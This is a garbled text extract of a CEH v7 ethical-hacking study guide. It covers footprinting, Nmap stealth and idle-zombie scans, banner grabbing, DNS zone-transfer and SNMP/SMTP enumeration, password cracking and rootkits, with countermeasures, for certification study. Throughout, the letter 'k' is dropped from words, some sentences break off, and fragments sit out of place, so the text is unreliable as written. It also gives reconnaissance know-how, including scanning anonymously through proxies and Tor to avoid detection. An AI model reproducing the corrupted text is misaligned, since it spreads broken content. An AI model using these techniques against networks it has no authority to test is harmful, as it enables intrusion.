You are on page 1of 203

C|EH v7.

( Study Guide )

2) Footprinting:Objectives: . . . . . . . . . . . . . . . What is Footprinting ? Objectives of Footprinting Footprinting Threats Footprinting Methodology Internet Footprinting Competitive Intelligence WHOIS Footprinting People Searching DNS Footprinting Network Footprinting Email Footprinting Google Hacking Additional Footprinting Tools Footprinting Countermeasures Footprinting Penetration Testing

What is Footprinting Footprinting is the term used for collecting inform ation about a target. This is the first step of fully identifying a target in order to begin planning an attack. Footprinting refers t o finding the digital and material footprint of information made by a targets existence. The objective of Footprinting is to find as much information as possible about a target from as many sources as you can secure. In malicious hacking and black box ethical hacking, i t is important to keep this information gathering secret as well. Relevant target information includes: Domain Name User and Group Names Network Blocks System Names IP Addresses Employee Details Networking Protocols Company Directory VPN points News Articles/Press releases Intrusion Detection system running System Banners

Footprinting Threats
The threat of Footprinting is that a hac er w find out sensitive ill inform ation about a target from a publicly accessible source. From the targets perspective it is important to now what information is available to the general public Footprinting Methodology

Footprinting begins with finding the targets main URL. Any search engine will us ually disclose this website. From this main website you can begin searching for other internal URL s s uch as intranet.*.com or mail.*.com

Internet Footprinting Our practice uses and for finding information that has be en, or is currently loaded on websites. s Waybac Machine eeps a database of when websites have changed their content organized by date so that you can view the website as it h progressed over the years. lists connections between websites that share a domain. Competitive Intelligence For business intelligence, any financial website will have inform ation on public traded companies. Job hunting websites such as and allow for searching by com which can be used to find out w technical s ills they are currently loo ing for. This allo hat for an intelligent hac er to have an idea where a company may be wea , or if they are loo ing to expand in new technology. WHOIS Footprinting The regional internet registries such as ARIN for North America eep a database of information about domain names and who owns them. This information can be used to find a target bl oc of external IP ally pany, w s to a


addresses and may provide information about technical points of contact, includi the occasional phone number and email address.


People Searching After a hac er has information about a company in general they may require more specific information about people employed or associated with the target. Using emails listed on inte rnet sources, a hac er may begin profiling social media websites such as Faceboo and Lin edIn loo ing for more information. More specific information can be found on people searching websites, government websites for court cases, and Google Earth can be used to find location data. DNS Footprinting Using online tools such as www.chec , the publically available DNS recor ds for a site or IP address can be located. Some systems have more information than others. This inf ormation may give a hac er a better understanding of a naming scheme and the organization of a targe computer system. Networ Footprinting


Footprinting the edge networ WHOIS and then using a

of a target begins with finding the IP range from

tool such as traceroute to determine the position of routers and possible DMZ s. T raceroute measures hops in the route from one address to another by manipulating the Time to Live o f ICMP pac ets. It is at this point that Footprinting becomes Active. Reading information is a passive me Sending probes such as traceroutes to a target and getting a response bac is an active method. Anytim you connect w the target it is A e ith ctive footprinting. If you call the a utomated attendant in the m iddle of the night to w out the phone tree, this is active. or


Email Footprinting Email trac ing can be used to monitor emails sent, when they are read and from w hat IP address. Email sending programs can generate random email possibilities such as Jsmith@hac erta to find out what names are actually in use. Using these techniques it is possible to map out organization s email structure. This can also be used to learn if there are any rules bloc ing execut ables, PDF documents, and size restrictions. Remember, any phishing emails sent to the mail server address schema is active footprinting. Google Hac ing Google hac ing refers to using the power of the advanced operator options in sea rch engines to find exploitable targets and footprint nown targets in a simple fashion. For example using the intitle operator you can search for websites that have in their title the word password wh ich could give you valuable information about password policies or even a document listing password s.


ing The hac website Google Hac ing Database has a list of common s earches used by hac ers, although this information is becoming outdated. Google Advanced Operators . [s :] ite . [a title llin :] . [in ] title . [in r ul:] Additional Footprinting Tools In addition to other tools previously m entioned, M altego is another great footpr inting tool. It provides a graphical representation of data. The use of this tool m es it easier to visu a connections found in Footprinting a target and ways of finding relationships that may not have been a pparent at first glance. However, it is important to now that Maltego maintains a cache of data that is always the most up to date.



Footprinting Countermeasures The most important countermeasure to Footprinting is: nowing what information i s available to outside requests. The information that is available may not be sensitive or wort h eeping secret, but if an entity does not now what is available they cannot ma e that determination. Proper configuration of networ devices can protect from most technical Footprin WHOIS inform ation registered should point to a position in the com pany not a specific person. Policies should be enacted for the release of information through any channel, w email, phone communications, and any other method. Once the information is released it will b cataloged and ept in some form somewhere.


eb, e

Note: The CEH exam expects you to have Be fam iliar w ith: 20 FTP data 110 POP3 21 FTP control 135 SMB 22 SSH 137 Netbios 23 Telnet 138 Netbios 25 SMTP 139 Netbios 53 DNS TCP and UDP! 161 SNMP 69 TFTP 389 LDAP 80 HTTP 443 HTTPS 88 Kerberos 636 LDAP over SSL or TLS

nowledge of standard ports.

Footprinting Pen Testing First and foremost, get proper written authorization before beginning any Footpr inting. For the most part, passive information gathering is legal. However, legal does not always eth ical as well. After you have written authorization find out as much as you can about your target using p assive techniques, documenting everything you find along the way. Once you have exhausted passive s ources, use active sources as anonymously as possible to eep yourself from being noticed. Document ation at this stage w m e every other hac ing activity easier. ill a

Module 3 Scanning Networks Study Guide Objectives: . Definition and Types of Scanning . Understanding CEH Scanning Methodology . Chec ing Live Systems and Open ports . Understanding Scanning Techniques . Different Tools Present to Perform Scanning . Understanding Banner Grabbing and OS Fingerprinting Drawing Networ Diagrams and Vulnerable Hosts . Preparing Proxies . Understanding Anonymizers . Scanning Countermeasures . Scanning Pen Testing Definitions and Types of Scanning Networ scanning is a procedure for identifying active hosts on a networ , eith er for the purpose of attac ing them or for networ security assessment. Scanning procedures, such as sweeps and port scans, return information about which IP addresses map to live hosts that are ac tive on the Internet and what services they offer. Port Scan - An attac that sends client requests to a range of server port addre sses on a host, with the goal of finding an active port and exploiting a now vulnerability of that serv n ice. Vulnerability Scan- Designed to assess computers, computer systems, networ s or applications for wea nesses. Networ Scan- Identifies active hosts on a networ Understanding CEH Scanning Methodology 1. Chec for Live Systems 2. Chec for Open Ports 3. Banner Grabbing 4. Scan for Vulnerability 5. Draw Networ Diagrams 6. Prepare Proxies


Chec ing Live Systems and Open ports ICMP Scanning- During most ping scans using ICMP, an ICMP_ECHO datagram is sent to the remote computer to determine whether it has an active IP or not. If all is w ell the computer that sent the ICMP_ECHO pac et will receive an ICMP_ECHO_REPLY pac et w hich means that the host computer is up and alive. If no response is received, it usu means that the host com puter is dow or an adm n inistrator is filtering the reply from t host. The simplest of tools to do this is to use the ping command which comes with most *n systems and Windows systems ali e. Ping Sweeps - are used to determine live hosts from a range of IP addresses by s ending ICMP ECHO requests to multiple hosts, if they are alive they will respond with a n ICMP ECHO reply. It can be used to create an inventory of live systems on a networ . TCP Three Way Handsha e- To establish a connection, TCP uses a three-way handsha e. Before a client attem to connect w a server, the server m first bind to a port t o pts ith ust open it up for connections: this is called a passive open. Once the passive open is established , a client may initiate an active open. To establish a connection, the three-way (or 3-step) handsha e occu rs: 1. SYN: The active open is performed by the client sending a SYN to the server. It sets the segment's sequence number to a random value A. 2. SYN-ACK: In response, the server replies with a SYN-ACK. The ac nowledgment n umber is set to one more than the received sequence number (A + 1), and the sequence number that the server chooses for the pac et is another random number, B. 3. ACK: Finally, the client sends an ACK bac to the server. The sequence number is set to the received ac nowledgement value i.e. A + 1, and the ac nowledgement number is set to one more than the received sequence number i.e. B + 1.

ally he ix At this point, both the client and server have received an ac nowledgment of the connection If that didn t sin in, here s another w of thin ing about it ay Three Way Handsha e is a lot li e a phone call You dial the number, (the initial connection, (SYN)), the recipient pic s up the phone, ( hello , (SYN/ACK)), and you respond Hi there, this is Bill , (ACK). From there you tw tal , (lots of ACK s). o At the end of the conversation one of you says well, I gotta go , (FIN), the other person says, o , see you, bye, (FIN/ACK), you say Bye , (ACK), and the conversation closes by you both putting the phone down. In between there are a bunch of ACK/PSH and ACK s as you two chat. Each part of th e conversation is bro en down into sentences if you will. As the two of you transfer data those sent ences are passed bac and forth with those ACK/PSH and ACK flags set and The Hping2 / Hping3 Hping is a free pac et generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networ s, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new versio n of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP pac ets, so that the programmer can write scripts related low level TCP/IP pac et manipulation and analysis in a very short time. Li e most tools used in com puter security, hping is useful to security experts, but there are a lot of applications related to networ testing and system administration. Understanding Scanning Techniques (-s*) = Switches used in Nmap This is Zenmap which is the front-end GUI for nmap, very helpful to learn switch es

to TCP Connect/ Full Open Scan (-sT) The TCP connect scan is named after the connect call that's used by the operati ng system to initiate a TCP connection to a remote device. Unli e the TCP SYN scan (-sS), the TCP connec t scan uses a normal TCP connection to determine if a port is available. This scan method uses the sa TCP handsha e connection that every other TCP-based application uses on the networ . This scan is very noisy on a networ and highly detectable through application e vent logs. It might be considered the TCP scan of last resort. If privileged access isn't available and determination of open TCP ports is absolutely necessary, however, this scan may be the only method availab le. Stealth Scan (Half-Open Scan) (-sS) The TCP SYN scan uses common methods of port-identification that allow nmap to gather information about open ports without completing the TCP handsha e process. When an open port is identified, the TCP handsha e is reset before it can be completed. This techniqu e is often referred to as "half open" scanning. The SYN scan is a common scan when loo ing for open ports on a remote device, an d its simple SYN methodology wor s on all operating systems. Because it only half-opens the TCP c onnections, it's considered a very clean scan type. The TCP SYN scan never actually creates a TCP session so it isn't logged by the destination host's applications. This is a much "quieter" scan than the TCP connect scan, and there 's less visibility in the destination system application logs since no sessions are ever initiated. 's


The SYN Scan requires privileged access to the system. Without privileged access cannot create the raw pac ets necessary for this half-open scan The SYN scan only provides open, closed, or filtered port information. To determ operating system or process version information, more intrusive scanning is required, such as the ve rsion scan (-sV) or the operating system fingerprinting (-O) option. Xmas Scan (-sX), FIN Scan (-sF), and NULL Scan (-sN) These three scans are grouped together because their individual functionality i s very similar. These are called "stealth" scans because they send a single frame to a TCP port withou TCP handsha ing or additional pac et transfers. This is a scan type that sends a single fram w th e i the expectation of a single response. The differences between them are how the TCP flags are set: Xmas FIN/URG/PUSH flags



t any

FIN FIN flag Null-No Flags set) The XMAS Scan (-sX) sends a TCP frame to a remote device with the FIN, URG, PUSH flags set. This is called a Xmas tree scan because of the alternating bits turned on and off in the byte (00101001), m uch li e the lights of a Christm tree. as

flags The FIN Scan (-sF) The TCP FIN scan identifies listening TCP port numbers based on how the target device reacts to a transaction close request for a TCP port (even though no conn ection may exist before these close requests are made). This type of scan can get through basic firewall and boundary routers that filter on incoming TCP pac ets with the Finish (FIN) and ACK flag combinati The TCP pac ets used in this scan include only the TCP FIN flag setting. The Null Scan (-sN) is a type of TCP scan that hac ers both ethical and maliciou s use to identify listening TCP ports. In the right hands, a Null Scan can help identify potential holes for server hardening, but in the w rong hands, it is a reconnaissance tool. It is a pre-attac probe. A Null Scan is a series of TCP pac ets that contain a sequence number of 0 and n o set flags. In a production environment, there will never be a TCP pac et that doesn t contain a fl Because the Null Scan does not contain any set flags, it can sometimes penetrate firewalls and ed ge routers that filter incoming pac ets with particular flags. The expected result of a Null Scan on an open port is no response. Since there a re no flags set, the target will not now how to handle the request. It will discard the pac et and no reply will be sent. If the port is closed, the target will send an RST pac et in response The IDLE Scan The IDLE scan (-sI) is the ultimate stealth scan but can me more time consuming . You also need to locate a zombie wor station/networ device that is IDLE, hence the name. If the zombie is not idle and has other netw traffic, it w bum up its IP ID sequence and disrupt the sc an or ill p logic.

s on.

ag. The lower the latency between the attac er and the zombie, and between the zombi e and the target, the faster the scan w proceed. ill Simple networ devices such as printers often ma e great zombies because they ar commonly both underused (idle) and built with simple networ stac s which are vulnerable to IP ID traffic detection. Open Port: Using a spoofed zombie IP address you will send a SYN pac et to the t arget, if the target s port is open, it will send a SYN/ACK to the zombie. The zombie will respond to t SYN/ACK with a RST pac et bumping up its IP ID by 1. Closed Port: If the port is closed, your SYN pac et spoofing the zombie s IP addre ss will cause the target machine to respond with a RST pac et. The zombie will not respond to the RST pac et, and the IP ID will not be incremented. ICMP Echo Scanning/List Scan The ICMP Echo scan (-sP) is the most simplistic discovery method and the easies t to detect. By sending a series of ICMP echo request (ICMP type 8) pac ets to various IP addres ses, a hac er can determine which systems are active (or "alive"). Knowing that Intrusion Detectio Systems (IDSs) are designed to catch this type of discovery sequence, hac ers vary the destination devices or delay the ping interval by minutes, hours, or even days. e

he -sL (List Scan) The list scan is a degenerate form of host discovery that sim lists each host of ply the networ (s) specified, without sending any pac ets to the target hosts. By default, Nm sti ll ap does reverseDNS resolution on the hosts to learn their names. It is often surprising how muc h useful information simple hostnames give out. For example, fw.chi is the name of one co mpany's Chicago firewall. Nmap also reports the total number of IP addresses at the end. The list scan is a good sanity chec to ensure that you have proper IP addresses for your targets . If the hosts sport domain names you do not recognize, it is worth investigating further to pr scanning the wrong company's networ SYN/Fin Scanning Using IP Fragments (-f) Fragmentation scanning : This is not a new scanning method in and of itself, a modification of other techniques. Instead of just sending the probe pac et, you brea it into a couple of sm IP fragm all ents. You are splitting TCP header over several pac ets to m e it harder for pac et filters a to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny pac ets. up the and so forth but


The f instructs the specified SYN or FIN scan to use tiny fragmented pac ets. UDP Scanning

This scanning method varies from the above in that we are using the UDP protoco l instead of TCP. W hile this protocol is sim pler, scanning it is actually significantly m diffi ore This is because open ports don't have to send an ac nowledgement in response to our probe, and closed ports aren't even required to send an error pac et. Fortunately, most hosts do send an ICMP_PORT_U NREACH error when you send a pac et to a closed UDP port. Thus you can find out if a port is NOT o and by exclusion determine which ports which are. Neither UDP pac ets, nor the ICMP errors are gu aranteed to arrive, so UDP scanners of this sort must also implement retransmission of pac ets that app ear to be lost (or you w get a bunch of false positives). ill



Also, you will need to be root for access to the raw ICM soc et necessary for r P eading the port unreachable. The -u (UDP) option of nmap implements this scanning method for roo t users.

Some thin UDP scanning is pointless, however you may come across holes where se rvices are running on undocumented higher UDP ports. While some lower ports maybe bloc ed you may b e successful with scanning higher ports.

Inverse TCP Flag Scanning Filtering and other security systems such as firewalls and IDS can detect SYN pa c ets and there are programs available that can detect half-open SYN Flag scan attempts as well. Probe pac ets with strange TCP Flags set can sometimes pass through undetected, depending on the security mechanisms in place. Using malformed TCP flags to probe a target is nown as an inverted technique be cause responses are sent bac only by closed ports. RFC 793 states that if a port is closed on a hos RST/ACK pac et should be sent to reset the connection. To ta e advantage of this feature, attac send TCP probe pac ets with various TCP flags set. A TCP probe pac et is sent to each port of the target host. Three types of probe pac et flag configurations are normally used: . A FIN probe with the FIN TCP flag set . An XMAS probe with the FIN, URG, and PUSH TCP flags set NULL probe with no TCP flags set .A

t, an ers

RFC standard 793 states that if no response is seen from the target port, eithe r the port is open or the server is down. This scanning method isn t necessarily the most accurate, but it is stealthy; it sends garbage that usually won t be pic ed up to each port.

For all closed ports on the target host, RST/ACK pac ets are received. However, some operating platforms (such as those in the Microsoft Windows family) disregard the RFC 793 standard, so no RST/ACK response is seen when an attempt is made to connect to a closed port. He nce, this technique is effective against some Unix-based platforms. ACK Flag Scanning (-sA) A stealthy technique is that of identifying open TCP ports by sending ACK probe ets and analyzing the header information of the RST pac ets received from the target host. This te chnique exploits vulnerabilities within the BSD-derived TCP/IP stac and is therefore only effect ive against certain operating systems and platforms. There are two main ACK scanning techniques: . Analysis of the tim e-to-live (TTL) field of received pac ets Analysis of the WINDOW field of received pac ets . pac

These techniques can also chec filtering systems and complicated networ s to un derstand the processes pac ets go through on the target networ . For example, the TTL value c used as a mar er of how many systems the pac et has hopped through

an be

Different Tools Present to Perform Scanning IP Fragmentation tools: Fragtest, Fragroute for fragmenting probe pac ets. Nmap: Free, open source utility for networ exploration /mapping. Nmap will extract information such as: Live hosts on a networ Services (application names and versions) Operating Systems (OS Versions) Type of pac et (filters/firewalls) SuperScan: is a powerful TCP port scanner, that includes a variety of additional networ ing tools li e ping, traceroute, HTTP HEAD, WHOIS and more. It uses multi-threaded and asynchro nous techniques resulting in extrem fast and versatile scanning. ely Understanding Banner Grabbing and OS Fingerprintng OS Fingerprinting determines what operating system is running on a remote target system. There are two types of OS Fingerprinting: Active and Passive. Active OS Fingerprinting uses specially crafted pac ets sent to the remote OS an d the response is compared with a database to determine the OS. Reponses from different Operating Systems vary due to differences in TCP/IP stac implementation.

Passive OS Fingerprinting uses sniffing techniques to capture pac ets flowing fr the system. Captured pac ets are then analyzed for OS information. It is also based on varia of how the TCP/IP Stac is implemented. Banner Grabbing Banner Grabbing is an enumeration technique used to glean information about com puter systems on a networ and the services running its open ports. Administrators can use this to ta e inventory of the systems and services on their networ . An intruder however can use banner grabbi ng in order to find networ hosts that are running versions of applications and operating systems wi th nown exploits. A telnet client can be used for banner grabbing: telnet [target ip or URL] [port ] telnet 80

om tions

then you may use GET or HEAD COMMANDS in your telnet session, the HEAD command w ill suffice for fingerprin ting ex. HEAD /HTTP /1.0

Banner grabbing from error pages Typing in a URL that does not exist on a server can result in an error page lis ting server inform ation.

Drawing Networ Diagrams and Vulnerable Hosts Vulnerability scanning- Identifies vulnerabilities and wea nesses of a system an d networ in order to determine how a system can be exploited Scanning tools: Saint, Nessus and Core Impact Networ Diagrams- The physical networ topology can be directly represented in a networ diagram, as it is simply the diagrams with networ nodes and connections as undirected or di edges (depending on the type of connection). The logical networ topology can be inferred from th networ diagram if details of the networ protocols in use are also given. Preparing Proxies Proxy Server - a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients see ing resources from other servers. A c lient connects to the proxy server requesting some service such as a file, connection, web page, or ot her resource available from a different server. The proxy server then evaluates the request according t o its filtering rules. There are thousands of free public proxy servers that are easily found on google Attac ers use them for scanning and attac ing anonymously Soc schain is a program that allows a user to wor with any Internet service thr a chain of SOCKS or HTTP proxies to hide the real IP-address. ough

rect e

TOR (The Onion Routing) Proxy Chaining software Tor is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer networ of servers in order to conceal a user's location o usage from someone conducting networ surveillance or traffic analysis. Using Tor ma es tracing Int ernet activity, including "visits to Web sites, online posts, instant messages and other communication for to the user more difficult.[7] It is intended to protect users' personal freedom privacy, and ab ility , to conduct confidential business, by eeping their internet activities from being monitored.[8] The soft is open-source and the networ is free of charge to use HTTP Tunneling HTTP Tunneling is a technique by which communications performed using various networ protocols are encapsulated using the HTTP protocol, the networ protocol s in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the networ protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed an HTTP Tunnel. HTTP Tunnel software consists of client-server HTTP Tunneling applications that integrate with existing application software, perm itting them to be used in conditions of restricted net wor connectivity including firewalled networ s and networ s behind proxy servers. SSH tunneling A Secure Shell (SSH) tunnel consists of an encrypted tunnel created through a SS H protocol connection. Users may set up SSH tunnels to transfer unencrypted traffi over a networ through an encrypted channel.



To set up an SSH tunnel, one configures an SSH client to forward a specified loc al port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect t o the specified local port to access the networ service. The local port need not have the same port n umber as the remote port. SSH tunnels provide a means to bypass firewalls that prohibit certain Internet s ervices so long as a site allows outgoing connections. For example, an organization may prohibit a us from accessing Internet web pages (port 80) directly without passing through the organization's proxy filter (which provides the organization with a means of monitoring and controlling what the us sees through the web). But users may not wish to have their web traffic monitored or bloc ed by t organization's proxy filter. If users can connect to an external SSH server, they can create an SSH t unnel to forward a given port on their local machine to port 80 on a remote web-server. To access the rem web-server users w ould point their brow to the local port at ser http://localhost/. SSL Proxy You probably now secure HTTP from secure websites. Say, you want to operate a s ecure web server but have only a normal server. SSL Proxy can be your solution: It's plugged into connection between the client and the server and adds Secure Soc et Layer (SSL) support. Or the oth way around: You have an ordinary telnet client but w to connect to a secure site. Just start SSL P ant with the appropriate parameters and you re good to go. That's what SSL Proxy can do for you Understanding Anonymizers Anonymizer An anonymizer or an anonymous proxy is a tool that attempts to ma e activity on the Internet untraceable. It is a proxy server computer that acts as an intermed iary and privacy shield between a client com puter and the rest of the Internet. It accesses the Internet on the user's behalf, protecting personal inform ation by hiding the client com puter's identifying info rmation.


er he


the er roxy

IP Address Spoofing IP address spoofing or IP spoofing refers to the creation of Internet Protocol ( pac ets with a forged source IP address, called spoofing, with the purpose of concealing the identity of the sender or impersonating another computing system. Scanning Countermeasures Ethical hac ers use their tool set to test the scanning countermeasures that hav e been implemented. Once a firewall is in place, a port-scanning tool should be run against hosts on the networ to determine whether the firewall correctly detects and stops the scanning activity. The firewall should be able to detect the probes sent by port-scanning tools. The firewall should carry out stateful inspections, which means it examines the data of the p ac et and not just the TCP header to determine whether the traffic is allowed to pass through the firewall. Networ IDS should be used to identify the OS-detection method use some common hac ers tools, such as Nmap. Only needed ports should be ept open. The rest should be filtered or bloc ed. The staff of the organization using the systems should be given appropriate trai on security awareness. port IP)

d by


War Dialing Countermeasure War Dialing is the technique of using a special program with a modem to automati cally scan a list of telephone numbers, usually dialing every number in a local area code to searc computers. W hen hac ers target companies, one of the first things they do is war dial the c entral office near the com pany. Com panies rarely control the dial-in ports as strictly as the firew all, machines with attached modems are sprin led throughout the company on people's des top compute rs and specialpurpose computers that communicate with partners. War Dialing Tools: WarVOX, PhoneSweep, and ToneLoc to detect War Dialing: Sandtrap Tool

h for


Scanning Pen Testing 1. Perform Host discovery (Nmap, Angry IP Scanner, etc.) 2. Perform Port scanning (Nmap,Netscan, UDP Scanner,etc.) 3. Perform Banner Grabbing/OS Fingerprinting (Telnet, Netcraft, Error Pages, etc .) 4. Scan for vulnerabilities (SAINT, Core Impact,Nessus) 5. Draw Networ Diagrams (LAN Surveyor, Ipsonar) 6. Prepare Proxies (Proxifier, Soc sChain, SSL Proxy) 7. Document all findings Module 4 Enumeration Study Guide Objectives: . Enumeration Defined . Techniques for Enumeration . NetBIOS Enumeration . User Account Enumeration . SNMP Enumeration . Unix/Linux Enumeration . LDAP / Active Directory . NTP Enumeration . SMTP and DNS Enumeration . Enumeration Countermeasures Enumeration Defined Enumeration is the process of extracting user names, machine names, networ reso urces, and lists of services from a target environment. This step in the methodology is often carrie d out along with scanning. As your information comes in from your various tests and sources it is imperative to Document Everything. Enumeration often comes into play when a hac er has wor ed themselves into a place on the networ , such as on an intranet Techniques for Enumeration The techniques listed below are used to gather Username information or networ d evice information. In order to create a clearer picture of a target, multiple methods are commonly together. NetBIOS Enumeration NetBIOS refers to an older method of communication over a networ to control ses sions. This is still commonly used over TCP/IP. The name service eeps a list of computers that belon g to a domain. If services that are used contain NetBIOS names, this may allow a hac er to create a list of computers in the networ . For example running the psexec tool can be used to list an ipconfig output from all the computers on the domain. User Account Enumeration Creating a list of user accounts is often necessary for a hac er. User accounts be found on a local machine or in a domain structure. can

used SNMP Enumeration The Simple Networ Management Protocol is intended to be used to remotely monito r devices on a networ using TCP/IP. Using this protocol an attac er can extract information, e specially if the default public and private names are still in use. Most networ monitoring software can be u sed in this manner. Unix/Linux Enumeration These systems have some standard commands for finding information on the networ showmount command finds shared directories. The finger command can be used to list user, h ost, and other information on a system. Rpcclient and rpcinfo can be used to determine username s and applications communicating over the networ LDAP Enumeration Lightweight Directory Access Protocol is a method used to access listing in an A ctive Directory type environment. Using a tool such as JXplorer a hac er can attach to a directory an d read the contents in a very manageable form. NTP Enumeration Using the Networ Time Protocol on UDP 123, computers on a networ can be ept i sync with the NTP server. This also allow for tools to scan and determ s ine if this port is open on target systems. n . The

SMTP Enumeration The Simple Mail Transfer Protocol was not built with security in mind. Accessing server with SMTP port 25 open can be a very simple process. The SMTP server provides feedbac abo ut email addresses as they are given to the service, this can be used to verify newly found em a ail ddresses DNS Enumeration The Domain Name service provides a translation for IP addresses that devices use on a networ into words that are better understood and remembered by humans. If configured incorre ctly it is possible for an attac er to use this service to enum erate all the system on a networ . F s the command line the syntax is: host -l domain name ip address or dns name of DNS server. The nsl command can also be used to enumerate hosts. Enumeration Countermeasures As always, only use services that are necessary for a system. If you do not need SNMP, NTP, SMTP, or LDAP, eep them disabled. You should always change default passwords to accounts , even on networ devices such as routers, switches, and gateways. Restrict information from being accessed by Anonymous connections. Test configurations of DNS and SMTP servers to ensure the y are configured properly and are only accessed by systems and users who have been authenticated. a

rom oo up Module 5 System Hac ing Study Guide Objectives: . Introduction to System Hac ing . Password Crac ing . Password Crac ing Techniques . Types of Password Attac s . Automatic Password Crac ing Algorithm Privilege Escalation . Executing Applications . Keylogger . Spyware . Root its . Detecting Root its . NTFS Data Stream . What is Steganography . Steganalysis . Covering Trac s

Description: .jpg Description: Introduction to System Hac ing Stages of hac ing and where System Hac ing comes in: 1. Footprinting -IP ranges, Namespace, Employee Web Usage 2. Scanning- Target assessment, Identification of services, Identification of Sy stems 3. Enumeration- Intrusive probing, User lists, Security flaws 4. System Hac ing- a) Gaining Access (Crac ing Passwords, Escalating Privileges)

b) Maintaining Access (Executing Applications, Hiding Files) c) Clearing logs (Covering Trac s) Password Crac ing Password crac ing is the process of recovering passwords from data that has been stored in or transmitted by a computer system. Password complexity is crucial in the defense against password crac ing Password Crac ing Techniques Dictionary Attac s A dictionary attac uses a targeted technique of successively trying all the words in an exhaustive list called a dictionary (from a pre-arranged list of values). A d ictionary attac tries only those possibilities w hich are m li ely to succeed, typically derived from a l ost words for example a dictionary (hence the phrase dictionary attac ) or a bible etc. G enerally, dicti onary attac s succeed because many people have a tendency to choose passwords which are short (7 chara cters or fewer).

ist of

Description: .jpg Description: Brute Forcing Attac s or exhaustive ey search is a strategy that can in theory used against any encrypted data by an attac er who is unable to ta e advantage of any wea ness in encryption system that would otherwise ma e his/her tas easier. It involves systematically chec ing all possible eys until the correct ey is found. Hybrid Attac - a Hybrid Attac builds on the dictionary attac method by adding numerals and symbols to dictionary words. Syllable Attac - It is the com bination of brute force and dictionary attac s. Th is can be effective for non-existent words. Rule-based Attac - used when an attac er gains some information, usually followi some form of enumeration that has identified the password policy in place. This allows the at er to customize the crac ing tools to be used. Types of Password Attac s Passive Online Attac s Wire Sniffing- Pac et sniffing tools can be run on a LAN to access and record ra w networ traffic. Active Online Attac s Man-in-the-Middle (MITM) attac - is a form of active eavesdropping in which the er ma es independent connections with the victims and relays messages between them, ma in g them believe that they are tal ing directly to each other over a private connection, w hen in fact the entire conversation is controlled by the attac er.

be an

ng tac


Description: .jpg Description: Replay Attac This is an attac where an authentication session is captured by a sniffer, then replayed by an attac er to fool a computer into granting access. Trojans/Spyware/Keyloggersa) Trojans can be used to gain access to computers and phone home to an attac er giving them remote control of the system b) Spyware is a type of malware that can be installed on computers to collect pi of information about users without their nowledge


c) Keyloggers are a type of spyware that runs in the bac ground and allows recor ding of eystro es Hash Injection Attac - An attac er injects a compromised hash into a local sessi and uses the hash to validate and gain access to networ Rainbow Attac s: Pre-Computed Hash 1. Rainbow table-A rainbow table is a precomputed table for reversing cryptograp hash functions, usually for crac ing password hashes hic resources on

2. Computed Hashes- Computes the hash for a list of possible passwords and then compares it with the precomputed hash table. If a match is found then the password is crac e d

Description: .jpg Description: 3. Compare the Hashes- It is easy to recover passwords by comparing the captured password hashes to the precomputed tables

Distributed Networ Attac (DNA)- is a technique used to recover password protec ted files. In the past, recoveries have been limited to the processing power of one machine. DNA uses th power of machines across the networ or across the world to decrypt passwords Non-Electronic Attac s Social Engineering- is the art of manipulating people into performing actions or divulging confidential inform ation, in contrast to brea ing in or using technical crac ing techniques. Shoulder surfing- Unauthorized viewing of either the user s eyboard or screen whi le he/she is logging in Dumpster Diving-Searching for sensitive information in residential or commercial trash bins, printer trash bins, or at a user s des

Description: .jpg Description: Automatic Password Crac ing Algorithm . Find a valid user . Find encryption algorithm used . Obtain encrypted passwords . Create list of possible passwords Encrypt each word . See if there is a m atch for each user ID Repeat steps 1 through 6

. .

The vulnerability does not arise from the hashing process but from the storage. systems do not "decrypt" the stored password during authentication, but store the one-way hash. During the login process, the password entered is run through the algorithm generating a one-way and compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied. Therefore all that an attac er has to do in order to crac a passw ord is to get copy of the one-way hash stored on the server, and then use the algorithm to generate his/her own hash un til they get a match. Privilege Escalation Privilege escalation is the act of exploiting a bug, design flaw or configuratio oversight in an operating system or software application to gain elevated access to resources that are nor mally protected from an application or user. The result is that an application w m ith ore privileges than intended by the application developer or system administrator can perform unauthorized actio ns.



Description: .jpg Description: Executing Applications Attac ers execute m alicious applications in this stage. This is called system. Keylogger Keystro e logging is the action of trac ing (or logging) the eys struc on a e yboard, typically in a covert manner so that the person using the eyboard is unaware that their actions are b monitored. There are numerous eylogging methods, ranging from hardware and software-based approa ches to electromagnetic and acoustic analysis. Spyware Spyware is a type of malware that can be installed on computers, and which colle cts small pieces of information about users without their nowledge. The presence of spyware is typi cally hidden from the user, and can be difficult to detect. Typically, spyw are is secretly installed o the user's personal computer. Sometimes, however, spywares such as eyloggers are installed by the o wner of a shared, corporate, or public computer on purpose in order to secretly monitor other user s. Spyware programs can collect various types of personal information, such as Inte rnet surfing habits and sites that have been visited, but can also interfere w user control of the co ith mputer in other ways, such as installing additional software and redirecting Web browser activity. Spyware nown to change computer settings, resulting in slow connection speeds, different home pages, an d/or loss of Internet connection or functionality of other program s. owning the



Root its Root its are ernel programs that have the ability to hide themselves and cover up traces of their a ctivitie s They replace certain operating system calls and utilities with their own m odifie versions of those routines -Kernel root its can be especially difficult to detect and rem ove because they o perate at the same security level as the operating system itself, and are thus able to interce pt or subvert the most trusted operating system operations. Any software, such as antivirus softwa re, running on the com prom ised system is equally vulnerable.[30] In this situation, no part of system can be trusted. The attac er acquires root access to the system by installing a virus, Trojan, o spyware in order to e p it it x lo Root its allow the attac er to maintain hidden access to the system Detecting Root its Integrity Based Detection- compares a snapshot of file systems, boot records, or memory with a nown trusted baseline Signature Based Detection- This technique compares characteristics of all system processes and executable files with a database of now root it fingerprints Heuristic Detection- It loo s for deviations from normal system patterns and beh avior to find unidentified root its based on their execution path Cross View based Detection- This compares "trusted" raw data with "tainted" cont returned by an API (Application Programming Interface). ent d


